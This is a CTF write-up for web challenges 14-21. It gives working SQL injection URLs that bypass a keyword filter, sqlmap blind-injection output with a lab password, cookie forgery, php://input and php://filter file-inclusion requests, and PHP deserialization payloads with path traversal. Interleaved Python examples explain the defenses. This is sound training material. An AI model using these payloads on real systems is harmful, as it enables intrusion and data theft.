CTF論劍場 Web14-21 WriteUp

  • 8 October 2019
  • Notes

web14 GitHack

hint: I hear quite a lot got backed up

From the hint we can guess that this is a /.git/ sensitive-file disclosure; that directory holds everything git needs to operate. Probe it with the GitHack tool (project page: https://github.com/lijiejie/GitHack):

web15 vim

hint: the vim editor

Try submitting swp as the id parameter; the response is: 不是這裡不是這裡不是這裡!!!

Note that the URL at this point is /1ndex.php?id=swp&submit=提交查詢#. Changing the 1 to i and requesting that gives flag{Iswh1teooo000oo0}.

web16 江湖

Once you learn the Buddha's Palm (如來神掌) you should be able to beat him.

Entering the jianghu:

Clicking "refresh attributes" re-rolls the attribute values, which change dynamically; click confirm to enter:

  • The attributes panel says: each training or money-making action takes 5 seconds; please be patient.
  • Each training session raises the attributes by a certain amount and takes 5 s.
  • The shop says: blood, inner force, strength and composure must all be trained to maximum before you can learn the Buddha's Palm.
  • Each click on "earn money" adds 100 silver taels.

Combined with the hint "once you learn the Buddha's Palm you should be able to beat him", the intended route is to learn the Buddha's Palm and then challenge the demon, so we need to max out every attribute and buy the Buddha's Palm from the shop.

Plan: with enough silver we can max out the attributes and learn the Buddha's Palm.

Pressing F12 and viewing the page source shows the following JS script file:

The Cookie is as follows:

Download script.js to audit it; here VSCode is used (Shift + Alt + F on Windows reformats the code):

eval(function (p, a, c, k, e, r) {
    e = function (c) {
        return (c < 62 ? '' : e(parseInt(c / 62))) + ((c = c % 62) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if ('0'.replace(0, e) == 0) {
        while (c--) r[e(c)] = k[c];
        k = [function (e) { return r[e] || e }];
        e = function () {
            return '[57-9abd-hj-zAB]'
        };
        c = 1
    };
    while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('7 s(t){5 m=t+"=";5 8=9.cookie.n(\';\');o(5 i=0;i<8.d;i++){5 c=8[i].trim();u(c.v(m)==0)p c.substring(m.d,c.d)}p""}7 w(a){5 x=new Base64();5 q=x.decode(a);5 r="";o(i=0;i<q.d;i++){5 b=q[i].charCodeAt();b=b^i;b=b-((i%10)+2);r+=String.fromCharCode(b)}p r}7 ertqwe(){5 y="user";5 a=s(y);a=decodeURIComponent(a);5 z=w(a);5 8=z.n(\';\');5 e="";o(i=0;i<8.d;i++){u(-1<8[i].v("A")){e=8[i+1].n(":")[2]}}e=e.B(\'"\',"").B(\'"\',"");9.write(\'<img id="f-1" g="h/1-1.k">\');j(7(){9.l("f-1").g="h/1-2.k"},1000);j(7(){9.l("f-1").g="h/1-3.k"},2000);j(7(){9.l("f-1").g="h/1-4.k"},3000);j(7(){9.l("f-1").g="h/6.png"},4000);j(7(){alert("你使用如來神掌打敗了蒙老魔,但不知道是真身還是假身,提交試一下吧!A{"+md5(e)+"}")},5000)}', [], 38, '|||||var||function|ca|document|temp|num||length|key|attack|src|image||setTimeout|jpg|getElementById|name|split|for|return|result|result3|getCookie|cname|if|indexOf|decode_create|base|temp_name|mingwen|flag|replace'.split('|'), 0, {}))

The code has been run through packer; unpacking it with an online tool gives:

function getCookie(cname) {
    var name = cname + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i].trim();
        if (c.indexOf(name) == 0) return c.substring(name.length, c.length)
    }
    return ""
}

function decode_create(temp) {
    var base = new Base64();
    var result = base.decode(temp);
    var result3 = "";
    for (i = 0; i < result.length; i++) {
        var num = result[i].charCodeAt();
        num = num ^ i;
        num = num - ((i % 10) + 2);
        result3 += String.fromCharCode(num)
    }
    return result3
}

function ertqwe() {
    var temp_name = "user";
    var temp = getCookie(temp_name);
    temp = decodeURIComponent(temp);
    var mingwen = decode_create(temp);
    var ca = mingwen.split(';');
    var key = "";
    for (i = 0; i < ca.length; i++) {
        if (-1 < ca[i].indexOf("flag")) {
            key = ca[i + 1].split(":")[2]
        }
    }
    key = key.replace('"', "").replace('"', "");
    document.write('<img id="attack-1" src="image/1-1.jpg">');
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/1-2.jpg"
    }, 1000);
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/1-3.jpg"
    }, 2000);
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/1-4.jpg"
    }, 3000);
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/6.png"
    }, 4000);
    setTimeout(function() {
        alert("你使用如來神掌打敗了蒙老魔,但不知道是真身還是假身,提交試一下吧!flag{" + md5(key) + "}")
    }, 5000)
}

Run the following command in the console:

Try changing the money attribute to 1000000 and re-encrypting; the PHP script is as follows (thanks to 淚笑 for the guidance; my own Python script had some problems and gave inconsistent results):

<?php
function encode($payload) {
    $result = '';
    for($i = 0; $i < strlen($payload); $i++) {
        $b = ord($payload[$i]);
        $b = $b + (($i % 10) + 2);
        $b = $b ^ $i;
        $result = $result.chr($b);
    }
    return $result;
}

$payload = 'O:5:"human":10:{s:8:"xueliang";i:12;s:5:"neili";i:856;s:5:"lidao";i:83;s:6:"dingli";i:92;s:7:"waigong";i:0;s:7:"neigong";i:0;s:7:"jingyan";i:0;s:6:"yelian";i:0;s:5:"money";i:1000000;s:4:"flag";s:1:"1";}';

echo base64_encode(encode($payload));

//UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeFxphX2YZYgxYQ0VeXQRrQ3QICw51T3YFehZMV1pbS2gDMwAGe3sxdnIKYiA/Nj0+PXQTOxQXbB0nZmFieiM3EREbGg1AWQkoXikXKC9SSgIbHR0DAgdaRRVETj0HPD/ErO7v9un57/6iz/+wvrH30KzQuBfl+Pv96rLZ7d6k2dWcm5yM0dHQxy2OlcGSmZiIiIiIhovBiIL4kNTK0dea/7mC+4bu/er1SQ==
//encodeURIComponent->UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeFxphX2YZYgxYQ0VeXQRrQ3QICw51T3YFehZMV1pbS2gDMwAGe3sxdnIKYiA%2FNj0%2BPXQTOxQXbB0nZmFieiM3EREbGg1AWQkoXikXKC9SSgIbHR0DAgdaRRVETj0HPD%2FErO7v9un57%2F6iz%2F%2BwvrH30KzQuBfl%2BPv96rLZ7d6k2dWcm5yM0dHQxy2OlcGSmZiIiIiIhovBiIL4kNTK0dea%2F7mC%2B4bu%2Fer1SQ%3D%3D
?>
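As an added example (not code from the writeup or from the challenge), here is the same cookie transform in Python: decode mirrors decode_create() from script.js, encode mirrors the PHP encode() above, and the two round-trip. The second half shows why the cookie was forgeable and what the server was missing: the state is only obfuscated, not authenticated, so an HMAC over the serialized state (keyed with a secret the client never sees) is what would have made the edited money value detectable. The state string, the secret and the function names are constructed for this example.

```python
import base64
import hashlib
import hmac

# Constructed sample state in the same shape as the challenge's user cookie
# (a PHP serialized object), shortened to two properties for the example.
STATE = b'O:5:"human":2:{s:5:"money";i:100;s:4:"flag";s:1:"1";}'

# Constructed secret; on a real server it never reaches the client.
SECRET = b"constructed-demo-secret"


def encode(payload: bytes) -> bytes:
    """Mirror of the PHP encode() above: add (i % 10) + 2, then XOR with the index."""
    out = bytearray()
    for i, b in enumerate(payload):
        b = b + ((i % 10) + 2)
        b = b ^ i
        out.append(b & 0xFF)  # PHP chr() keeps only the low byte
    return bytes(out)


def decode(data: bytes) -> bytes:
    """Mirror of decode_create() in script.js: XOR with the index, then subtract (i % 10) + 2."""
    out = bytearray()
    for i, b in enumerate(data):
        b = b ^ i
        b = b - ((i % 10) + 2)
        out.append(b & 0xFF)
    return bytes(out)


def make_cookie(state: bytes) -> str:
    """Value of the user cookie before URL-encoding, built the way the challenge does."""
    return base64.b64encode(encode(state)).decode("ascii")


def read_cookie(cookie: str) -> bytes:
    """What the server (and script.js) recovers from the cookie."""
    return decode(base64.b64decode(cookie))


def sign_state(state: bytes, key: bytes = SECRET) -> str:
    """Hardened variant: the state stays readable, but an HMAC binds it to the server's key."""
    body = base64.b64encode(state).decode("ascii")
    tag = hmac.new(key, body.encode("ascii"), hashlib.sha256).hexdigest()
    return body + "." + tag


def verify_state(cookie: str, key: bytes = SECRET):
    """Return the state only if the tag matches; None means the cookie was altered or forged."""
    body, _, tag = cookie.rpartition(".")
    expected = hmac.new(key, body.encode("ascii"), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return base64.b64decode(body)


def demo() -> bool:
    """Round-trips the challenge scheme and shows the signed scheme rejecting an edited state."""
    cookie = make_cookie(STATE)
    assert read_cookie(cookie) == STATE
    # The challenge scheme is reversible by anyone holding script.js, so an edited
    # state (money raised to 1000000) decodes just as cleanly as the original.
    edited = STATE.replace(b"i:100;", b"i:1000000;")
    assert read_cookie(make_cookie(edited)) == edited
    # With a keyed MAC the same edit fails verification unless the server key is known.
    good = verify_state(sign_state(STATE))
    forged = verify_state(sign_state(edited, key=b"not-the-server-key"))
    return good == STATE and forged is None


if __name__ == "__main__":
    print("cookie:", make_cookie(STATE))
    print("signed:", sign_state(STATE))
    print("demo ok:", demo())
```

The masking with 0xFF in both directions matches what PHP's chr() does, so the Python pair round-trips for any input length; the JS decode omits it, which is harmless for the ASCII payloads the challenge uses.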

Send the request with the modified cookie field:

After raising the attributes and learning the Buddha's Palm, defeat the old demon to get the flag:

Additionally, /wulin.php holds an easter egg left by the challenge author that checks whether a flag is correct:

web17 Traffic analysis

Just open bugku.pcapng in Wireshark and follow the TCP stream to find the flag.

web18 Sql injection

The probing went as follows:

?id=1'                  blank response  -> probably closed with a single quote
?id=1'--+               normal response -> single-quote closure confirmed
?id=1' and 1=1--+       blank response  -> "and" is probably filtered
?id=1' And 1=1--+       blank response  -> the filter is case-insensitive
?id=1' anandd 1=1--+    normal response -> nested-keyword bypass works; "and" and "or" are stripped
?id=1' oorrder by 3--+                  -> 3 columns
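The probes above are consistent with a filter that deletes each blacklisted keyword once, case-insensitively, in a single pass, which is why doubling the keyword ("anandd", "uniunionon") survives it. As an added example (not the challenge's code; the filter, the tables and the rows are reconstructed assumptions), the block below implements that filter against an in-memory SQLite stand-in, shows the blacklist being stripped back into working keywords, and places it beside the parameterized query that removes the problem regardless of what the value contains:

```python
import re
import sqlite3

# Reconstruction of the filter the probes imply: every blacklisted keyword is deleted,
# case-insensitively, in one pass. This is an assumption about the server code,
# which the writeup does not show.
BLACKLIST = re.compile(r"and|or|union|select", re.IGNORECASE)


def strip_once(value: str) -> str:
    """Single-pass keyword deletion: 'anandd' -> 'and', 'uniunionon' -> 'union'."""
    return BLACKLIST.sub("", value)


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the web18 database (tables ctf and flag)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ctf (id INTEGER, name TEXT, note TEXT)")
    conn.execute("CREATE TABLE flag (id INTEGER, flag TEXT)")
    conn.executemany("INSERT INTO ctf VALUES (?, ?, ?)", [(1, "a", "x"), (2, "b", "y")])
    conn.execute("INSERT INTO flag VALUES (1, 'flag{constructed}')")
    return conn


def lookup_filtered(user_id: str):
    """Blacklist plus string concatenation. Returns None where the challenge showed a
    blank page, i.e. when the filtered text is no longer valid SQL."""
    conn = make_db()
    sql = "SELECT id, name, note FROM ctf WHERE id='" + strip_once(user_id) + "'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None


def lookup_parameterized(user_id: str):
    """The fix: the value is bound as data, so keywords inside it are never parsed as SQL."""
    conn = make_db()
    return conn.execute("SELECT id, name, note FROM ctf WHERE id=?", (user_id,)).fetchall()


if __name__ == "__main__":
    for probe in ["anandd", "uniunionon", "selselectect", "infoorrmation_schema"]:
        print(f"{probe:22} -> {strip_once(probe)}")
    nested = "-1' uniunionon selselectect 1,flag,3 from flag-- "
    print("blacklist + concat:", lookup_filtered(nested))
    print("bound parameter   :", lookup_parameterized(nested))
```

Note that the blacklist also mangles legitimate values ("information_schema" contains "or"), a second reason keyword filters do not belong in front of a query; the bound-parameter version needs no filter at all.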

Dump the databases:

?id=-1' uniunionon selselectect 1,group_concat(schema_name),3 from infoorrmation_schema.schemata--+

Result: information_schema,web18.

Dump the tables:

?id=-1' uniunionon selselectect 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='web18'--+

Result: ctf,flag.

Dump the columns:

?id=-1' uniunionon selselectect 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='flag'--+

Result: id,flag.

Dump the field:

?id=-1' uniunionon selselectect 1,flag,3 from flag--+

This yields flag{22b7a7c3d73d88050722b3eeb102ee45}.

web19 Poc And Exp's Love Note

A dirsearch scan shows a /.git/ disclosure:

Run GitHack on it; flag.txt gives Hint 1: flag is in /eXpl0ve5p0cVeRymuCh.

Running sqlmap shows a time-based blind injection:

---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: username=admin' AND SLEEP(5) AND 'JKEb'='JKEb&password=123
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---

Continue gathering information:

available databases [2]:
[*] information_schema
[*] web19

Database: web19
[2 tables]
+--------+
| user   |
| hlnt_2 |
+--------+

Database: web19
Table: user
[1 entry]
+----+----------+----------------+
| id | username | password       |
+----+----------+----------------+
| 1  | admin    | p0CLOvesExpT00 |
+----+----------+----------------+

Database: web19
Table: hlnt_2
[1 entry]
+----+-----------------------------------------------+
| id | hInt                                          |
+----+-----------------------------------------------+
| 1  | a class for you "https://postimg.cc/6274vCP5" |
+----+-----------------------------------------------+

Log in to the admin account with the username and password obtained:

Viewing the page source reveals commented-out content:

Combined with the travelogue text, this is probably snow HTML steganography (it hides data at the ends of lines of ASCII text, using tabs and spaces so the embedded data is invisible in a browser). Capture the page with Burp Suite and save it as 1.html (saving it from Firefox for analysis had problems; thanks to 冷暗雨 for the guidance).

C:\Users\light\Desktop>SNOW.EXE -C -p ILOveExp 1.html
flag in /PPPPOOO0CCCC.php

Combined with Hint 2 from the hlnt_2 table: a class for you "https://postimg.cc/6274vCP5"

Payload:

<?php
class ReadFile {
    public $file;
}

$payload = new ReadFile();
$payload->file = '../../PPPPOOO0CCCC.php';
echo serialize($payload);

//O:8:"ReadFile":1:{s:4:"file";s:22:"../../PPPPOOO0CCCC.php";}
//encodeURIComponent
//O%3A8%3A%22ReadFile%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A22%3A%22..%2F..%2FPPPPOOO0CCCC.php%22%3B%7D

web20 GET_key

Your dynamic ciphertext is: fb49037b2bb5315bdad5228d7cf0c34e2 Submit the matching ciphertext via GET to obtain the flag (form input name='key'). Output format: 'flag{….}'

Python script:

import re
import requests

url = 'http://123.206.31.85:10020/'
r = requests.session()                      # one session so the key stays valid for the follow-up request
text = r.get(url).text                      # page that shows the dynamic ciphertext
key = re.findall(r'[0-9a-z]+', text)[0]    # first alphanumeric run on the page is taken as the key
url2 = url + '?key=' + key
text2 = r.get(url2).text                    # submit it back via GET
print(text2)

Try a few times; after a correct submission there is a certain chance of getting flag{Md5tiMe8888882019}.

web21 LFI

Opening the page shows:

you are not admin !

Pressing F12 reveals commented-out PHP code:

$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}

Seeing file_get_contents() suggests a file inclusion vulnerability (see the notes on LFI (Local File Include) vulnerabilities). The approach:

  • Use php://input with a POST body of admin to pass the file_get_contents($user,'r')==="admin" check.
  • Use php://filter/read=convert.base64-encode/resource=class.php to read class.php.

/index.php?user=php://input&file=php://filter/read=convert.base64-encode/resource=class.php
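Both halves of that request work because user-supplied strings reach file_get_contents() and include() unchanged, so PHP stream wrappers (php://input, php://filter) and relative paths are honoured. As an added example (not the challenge's code; the directory, allowlist and function names are constructed), here is the kind of validation those parameters would need: reject anything with a URL scheme, resolve the value inside a fixed directory, and only then check it against an allowlist of files that actually exist there.

```python
import posixpath
import re

# Constructed settings: where includes may come from, and the files allowed there.
INCLUDE_DIR = "/var/www/app/includes"
INCLUDE_FILES = {"class.php", "index.php"}

# Anything that starts like a URL scheme (php:, data:, http:, phar:, ...) selects a PHP
# stream wrapper instead of a plain file, so it is rejected before touching the filesystem.
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.IGNORECASE)


def safe_include_path(value: str, base_dir: str = INCLUDE_DIR):
    """Return the absolute path to include, or None unless the value names an allowlisted
    file directly inside base_dir (no wrapper, no NUL byte, no traversal)."""
    if not value or "\x00" in value:
        return None
    if SCHEME.match(value):
        return None
    # posixpath.join discards base_dir when value is absolute; normpath collapses "..".
    candidate = posixpath.normpath(posixpath.join(base_dir, value))
    if posixpath.dirname(candidate) != posixpath.normpath(base_dir):
        return None
    if posixpath.basename(candidate) not in INCLUDE_FILES:
        return None
    return candidate


def classify(value: str) -> str:
    """Label a ?file= or ?user= value for log triage: wrapper, traversal or plain."""
    if SCHEME.match(value):
        return "wrapper"
    if ".." in value.split("/") or value.startswith("/"):
        return "traversal"
    return "plain"


if __name__ == "__main__":
    samples = [
        "class.php",
        "./class.php",
        "../../PPPPOOO0CCCC.php",
        "/etc/passwd",
        "php://input",
        "php://filter/read=convert.base64-encode/resource=class.php",
    ]
    for v in samples:
        print(f"{v!r:62} {classify(v):9} -> {safe_include_path(v)}")
```

posixpath is used instead of os.path so the result is the same on any host; on the PHP side the equivalent is to never pass the raw parameter to include() or file_get_contents() but to map it through a fixed table of known files.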

The response:

hello admin!
PD9waHANCmVycm9yX3JlcG9ydGluZyhFX0FMTCAmIH5FX05PVElDRSk7DQogDQpjbGFzcyBSZWFkey8vZjFhOS5waHANCiAgICBwdWJsaWMgJGZpbGU7DQogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9TdHJpbmcoKXsNCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsNCiAgICAgICAgICAgIGVjaG8gZmlsZV9nZXRfY29udGVudHMoJHRoaXMtPmZpbGUpOyAgICANCiAgICAgICAgfQ0KICAgICAgICByZXR1cm4gIl9fdG9TdHJpbmcgd2FzIGNhbGxlZCEiOw0KICAgIH0NCn0NCj8+

Base64-decoding it gives class.php:

<?php
error_reporting(E_ALL & ~E_NOTICE);

class Read{//f1a9.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
        }
        return "__toString was called!";
    }
}
?>

Note that __toString() reads and prints the contents of $this->file when it runs, so write a script to build the serialized object:

<?php
class Read{
    public $file;
}

$payload = new Read();
$payload->file = 'f1a9.php';
echo serialize($payload);
//O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}

Pass this as pass; when it is used as a string, __toString() is invoked and reads f1a9.php. Payload:

/index.php?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}
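web19 and web21 both turn on the same mechanism: a PHP serialized object supplied by the client is unserialized by the server, and a magic method on the resulting class (__toString() here) does the file read. As an added example covering both challenges (not the challenges' code), the block below is a small Python reader and writer for the subset of the PHP serialize format seen on this page (O:, s:, i:), which is enough to see exactly what class and properties a payload carries, plus an allowlist check that models PHP's unserialize($data, ['allowed_classes' => [...]]) option. The sample payloads are the three from this writeup; the function names are this example's own.

```python
# Payloads from this writeup (web21, web19 and the web16 cookie state).
READ_PAYLOAD = 'O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}'
READFILE_PAYLOAD = 'O:8:"ReadFile":1:{s:4:"file";s:22:"../../PPPPOOO0CCCC.php";}'
HUMAN_PAYLOAD = ('O:5:"human":10:{s:8:"xueliang";i:12;s:5:"neili";i:856;s:5:"lidao";i:83;'
                 's:6:"dingli";i:92;s:7:"waigong";i:0;s:7:"neigong";i:0;s:7:"jingyan";i:0;'
                 's:6:"yelian";i:0;s:5:"money";i:1000000;s:4:"flag";s:1:"1";}')


def _parse(s: str, pos: int):
    """Parse one value at pos and return (value, next_pos). Handles i:, s: and O: only;
    string lengths are byte counts in PHP, so this reader assumes ASCII content."""
    t = s[pos]
    if t == "i":
        end = s.index(";", pos)
        return int(s[pos + 2:end]), end + 1
    if t == "s":
        colon = s.index(":", pos + 2)
        n = int(s[pos + 2:colon])
        start = colon + 2  # skip :"
        value = s[start:start + n]
        if s[start + n:start + n + 2] != '";':
            raise ValueError("bad string at %d" % pos)
        return value, start + n + 2
    if t == "O":
        colon = s.index(":", pos + 2)
        n = int(s[pos + 2:colon])
        cls = s[colon + 2:colon + 2 + n]
        p = colon + 2 + n + 2  # skip ":
        colon2 = s.index(":", p)
        count = int(s[p:colon2])
        p = colon2 + 2  # skip :{
        props = {}
        for _ in range(count):
            key, p = _parse(s, p)
            val, p = _parse(s, p)
            props[key] = val
        if s[p] != "}":
            raise ValueError("unterminated object at %d" % pos)
        return (cls, props), p + 1
    raise ValueError("unsupported type %r at %d" % (t, pos))


def parse_php(data: str):
    """Parse a whole serialized value; trailing bytes are an error."""
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing data")
    return value


def _ser(v) -> str:
    if isinstance(v, bool):
        raise TypeError("booleans are not covered by this example")
    if isinstance(v, int):
        return "i:%d;" % v
    if isinstance(v, str):
        return 's:%d:"%s";' % (len(v.encode()), v)
    raise TypeError(type(v).__name__)


def serialize_object(cls: str, props: dict) -> str:
    """Produce the same text PHP's serialize() gives for an object with public properties."""
    body = "".join(_ser(k) + _ser(v) for k, v in props.items())
    return 'O:%d:"%s":%d:{%s}' % (len(cls), cls, len(props), body)


def safe_unserialize(data: str, allowed_classes):
    """Model of unserialize($data, ['allowed_classes' => [...]]): the text is parsed, but
    an object of a class outside the allowlist is refused instead of instantiated."""
    cls, props = parse_php(data)
    if cls not in allowed_classes:
        return None
    return cls, props


if __name__ == "__main__":
    for name, payload in [("web21", READ_PAYLOAD), ("web19", READFILE_PAYLOAD)]:
        cls, props = parse_php(payload)
        print(name, "->", cls, props, "| allowed:", safe_unserialize(payload, {"Read"}))
```

The allowlist is a partial mitigation: it stops the server from instantiating arbitrary classes, but in web21 the gadget is Read itself, which the application declares. The point that survives both challenges is that client-supplied data should not reach unserialize() at all; JSON with explicit field validation carries the same properties without a class name to abuse.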